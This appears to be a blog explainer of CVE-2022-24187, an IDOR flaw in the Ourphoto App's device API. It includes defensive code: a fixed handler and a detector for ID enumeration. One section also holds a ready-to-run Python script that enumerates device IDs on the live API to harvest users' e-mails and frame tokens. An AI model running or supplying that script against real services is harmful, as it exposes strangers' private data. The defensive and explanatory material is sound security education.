CVE-2022-24187 is a security vulnerability discovered in version 1.4.1 of the Ourphoto App, a platform for photo sharing and digital picture frames. This flaw is categorized as an Insecure Direct Object Reference (IDOR) vulnerability. It affects the /device/* API endpoints, specifically due to the insufficient security checks around the user_id and device_id parameters.

This article explains how the vulnerability works and its possible impact, shows a code example of how it is exploited, and links to the original references for further reading. The language is kept plain and clear so that readers can follow the risk and the mechanism regardless of their level of cybersecurity experience.

What is an IDOR Vulnerability?

In an Insecure Direct Object Reference (IDOR) vulnerability, attackers simply change one part of a request, such as a user ID in the URL, to directly access data they should not be able to see. These issues occur whenever developers reference objects by predictable IDs (for example, 12345 or 67890) in APIs without checking whether the current user actually owns, or is otherwise allowed to access, the referenced object.

Details of the Vulnerability

In the Ourphoto App 1.4.1, the /device/* endpoints rely on user_id and device_id parameters for data access. However, the app fails to enforce that requests using these IDs must come from the actual device owner or legitimate user.

Example vulnerable endpoint

GET https://api.ourphotoapp.com/device/12345

Here, 12345 is the device_id. If an attacker guesses or enumerates these IDs simply by incrementing or decrementing, they can retrieve information belonging to other users or devices.

The data exposed this way includes the user e-mail addresses and frame tokens mentioned under Real-World Impact below, together with any other information returned by these endpoints (profile details, device status, etc.).

This opens the door to privacy violations, targeted phishing, and possibly further exploitation, since the exposed frame tokens might be usable to access or control the user's photo frames.
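As an added illustration (not the Ourphoto App's own code, which is not shown on this page), the following Python models a /device/&lt;device_id&gt; handler twice: once with the missing ownership check that causes the IDOR, and once with the check enforced server-side. The in-process handler signatures, the user and device IDs, the e-mail addresses and the frame tokens are all constructed assumptions standing in for the real API and its data.

```python
# Added example (not the Ourphoto App's own code): a minimal in-process model
# of a /device/<device_id> handler, once without and once with an ownership
# check. All IDs, addresses and tokens below are constructed sample data.
from dataclasses import dataclass
from typing import Callable, Dict, Iterable, Optional, Tuple


@dataclass(frozen=True)
class Device:
    device_id: int
    owner_user_id: int
    email: str
    frame_token: str
    status: str


# Constructed sample store: user 1001 owns two frames, user 1002 owns one.
DEVICES: Dict[int, Device] = {
    12345: Device(12345, 1001, "alice@example.com", "tok-alice-1", "online"),
    12346: Device(12346, 1002, "bob@example.com", "tok-bob-1", "offline"),
    12347: Device(12347, 1001, "alice@example.com", "tok-alice-2", "online"),
}

Response = Tuple[int, Optional[dict]]  # (HTTP status, JSON-like body)


def serialize(device: Device) -> dict:
    return {
        "device_id": device.device_id,
        "email": device.email,
        "frame_token": device.frame_token,
        "status": device.status,
    }


def get_device_vulnerable(authenticated_user_id: int, device_id: int) -> Response:
    """IDOR pattern: the caller is authenticated (we know who they are), but the
    handler never asks whether they own device_id, so any valid ID yields data."""
    device = DEVICES.get(device_id)
    if device is None:
        return 404, None
    return 200, serialize(device)


def get_device_fixed(authenticated_user_id: int, device_id: int) -> Response:
    """Fixed pattern: resolve the record, then enforce ownership on the server
    side using the identity from the session, never a user-supplied user_id.
    Answering 404 for both 'no such device' and 'not yours' also stops the
    endpoint from confirming which IDs exist; return 403 instead if you want
    the distinction to be explicit."""
    device = DEVICES.get(device_id)
    if device is None or device.owner_user_id != authenticated_user_id:
        return 404, None
    return 200, serialize(device)


def readable_ids(handler: Callable[[int, int], Response],
                 authenticated_user_id: int, id_range: Iterable[int]) -> list:
    """Authorization test for your own handler: the IDs a given user can read.
    For a correct handler this is exactly the set of devices that user owns."""
    return [i for i in id_range if handler(authenticated_user_id, i)[0] == 200]


if __name__ == "__main__":
    # Constructed check: user 1002 (Bob) asks for the neighbouring IDs.
    print("vulnerable:", readable_ids(get_device_vulnerable, 1002, range(12340, 12350)))
    print("fixed:     ", readable_ids(get_device_fixed, 1002, range(12340, 12350)))
```

The readable_ids helper is the kind of authorization test worth keeping in a project's test suite: for every handler that takes an object identifier, assert that a user can only read the objects they own, so a regression of the ownership check fails the build rather than shipping.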

Exploiting CVE-2022-24187: Step-by-Step Example

Below is a code snippet using Python and the requests library, showing how an attacker might automate the enumeration of device data.

Install the required Python library

pip install requests

Example Exploit Script

import requests

API_URL = "https://api.ourphotoapp.com/device/"
START_ID = 10000  # First device ID to try; this is a guess, start from a known valid ID.
END_ID = 10100    # Last ID to try (exclusive), i.e. 100 IDs in this range.

for device_id in range(START_ID, END_ID):
    url = f"{API_URL}{device_id}"
    response = requests.get(url)
    # A 200 response whose body contains an e-mail field is treated as an exposed record.
    if response.status_code == 200 and "email" in response.text:
        print(f"Device ID: {device_id}")
        print(f"Response: {response.text}\n")
    else:
        print(f"Device ID {device_id} not found or unauthorized.")

The script:

- Loops through a range of device IDs.
- Sends a GET request to the /device/<device_id> endpoint for each one.
- Prints out the exposed information.

Note: A properly coded endpoint would return a 401 (unauthorized) or 403 (forbidden) response for any device the requester does not own, but because of this vulnerability the server returns the actual data for every valid ID regardless of the requester's identity.

Real-World Impact

If exploited, an attacker could download the full list of Ourphoto App user emails and frame tokens. These tokens could possibly allow them to interact with users’ digital photo frames, upload unauthorized images, or simply compromise user privacy.

The enumeration can be done at a large scale, because IDs are usually sequential (e.g., user 1001, 1002, 1003...), making mass scraping trivial.
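As an added example from the detection side (not part of the original post), the following Python reads API access-log lines and flags clients whose /device/&lt;id&gt; requests walk through IDs consecutively within a short window, which is exactly the signature of the mass scraping described above. The log format and every line in SAMPLE_LOG are constructed for this example, so the field layout is an assumption and parse_line() should be adapted to the real gateway's format; the thresholds are likewise starting points, not tuned values.

```python
# Added example (not from the original post): flag clients whose /device/<id>
# requests walk through IDs consecutively, the signature of mass enumeration.
# The log format and every line in SAMPLE_LOG are constructed for this example;
# adapt LOG_RE / parse_line() to the real gateway's format.
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Optional, Tuple

LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<ip>\S+) "GET /device/(?P<id>\d+)[^"]*" (?P<status>\d{3})$'
)

# Constructed sample: 10.0.0.5 behaves normally, 10.0.0.9 sweeps 12340..12349.
SAMPLE_LOG = """\
2022-11-28T10:00:00Z 10.0.0.5 "GET /device/12345 HTTP/1.1" 200
2022-11-28T10:00:00Z 10.0.0.5 "POST /login HTTP/1.1" 200
2022-11-28T10:00:01Z 10.0.0.9 "GET /device/12340 HTTP/1.1" 404
2022-11-28T10:00:02Z 10.0.0.9 "GET /device/12341 HTTP/1.1" 200
2022-11-28T10:00:03Z 10.0.0.9 "GET /device/12342 HTTP/1.1" 200
2022-11-28T10:00:04Z 10.0.0.9 "GET /device/12343 HTTP/1.1" 200
2022-11-28T10:00:05Z 10.0.0.9 "GET /device/12344 HTTP/1.1" 404
2022-11-28T10:00:06Z 10.0.0.9 "GET /device/12345 HTTP/1.1" 200
2022-11-28T10:00:07Z 10.0.0.9 "GET /device/12346 HTTP/1.1" 200
2022-11-28T10:00:08Z 10.0.0.9 "GET /device/12347 HTTP/1.1" 200
2022-11-28T10:00:09Z 10.0.0.9 "GET /device/12348 HTTP/1.1" 200
2022-11-28T10:00:10Z 10.0.0.9 "GET /device/12349 HTTP/1.1" 404
2022-11-28T10:00:30Z 10.0.0.5 "GET /device/12347 HTTP/1.1" 200
"""

Event = Tuple[datetime, str, int, int]  # (timestamp, client, device_id, status)


def parse_line(line: str) -> Optional[Event]:
    """Return (ts, ip, device_id, status) for a /device/<id> GET, else None."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%Y-%m-%dT%H:%M:%SZ")
    return ts, m.group("ip"), int(m.group("id")), int(m.group("status"))


def longest_consecutive_run(ids: List[int]) -> int:
    """Longest stretch of requests whose IDs differ by exactly 1, in order."""
    best = run = 1 if ids else 0
    for prev, cur in zip(ids, ids[1:]):
        run = run + 1 if abs(cur - prev) == 1 else 1
        best = max(best, run)
    return best


def flag_enumeration(log_text: str, min_distinct: int = 8, min_run: int = 5,
                     window_seconds: int = 60) -> Dict[str, dict]:
    """Per client, slide a time window over its /device requests and flag it
    once any window holds >= min_distinct IDs with a consecutive run >= min_run.
    The report covers the client's whole sequence: distinct IDs, longest run,
    and how many requests returned 200 (records actually exposed)."""
    by_ip: Dict[str, List[Tuple[datetime, int, int]]] = defaultdict(list)
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed:
            ts, ip, dev_id, status = parsed
            by_ip[ip].append((ts, dev_id, status))

    flagged: Dict[str, dict] = {}
    for ip, events in by_ip.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            while (events[end][0] - events[start][0]).total_seconds() > window_seconds:
                start += 1
            ids = [e[1] for e in events[start:end + 1]]
            if len(set(ids)) >= min_distinct and longest_consecutive_run(ids) >= min_run:
                all_ids = [e[1] for e in events]
                flagged[ip] = {
                    "distinct_ids": len(set(all_ids)),
                    "longest_run": longest_consecutive_run(all_ids),
                    "hits_200": sum(1 for e in events if e[2] == 200),
                }
                break
    return flagged


if __name__ == "__main__":
    for ip, stats in flag_enumeration(SAMPLE_LOG).items():
        print(f"enumeration suspected from {ip}: {stats}")
```

The hits_200 figure is the number that matters for incident scoping: with the vulnerable endpoint it is the count of records the client actually received, so it feeds directly into deciding which users' e-mail addresses and frame tokens must be treated as exposed and which tokens to rotate. Keying on the client address is a simplification; where the API requires a session or API key, key on that identity instead, since a scraper can spread requests across addresses far more easily than across accounts.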

References and Original Reports

- Mitre CVE entry: CVE-2022-24187
- Exploit-DB Entry
- Packet Storm Security Advisory
- OWASP IDOR Page

Conclusion

CVE-2022-24187 in Ourphoto App 1.4.1 shows how dangerous a simple web or mobile API flaw can be. Missing authorization lets anyone easily grab sensitive user data, violating privacy and potentially compromising device security. Always patch your apps, and for developers: never trust a user-supplied object identifier without a robust server-side permission check.

Feel free to share this post to help spread awareness about the risks of IDOR vulnerabilities in modern apps!

Timeline

Published on: 11/28/2022 22:15:00 UTC
Last modified on: 12/01/2022 23:21:00 UTC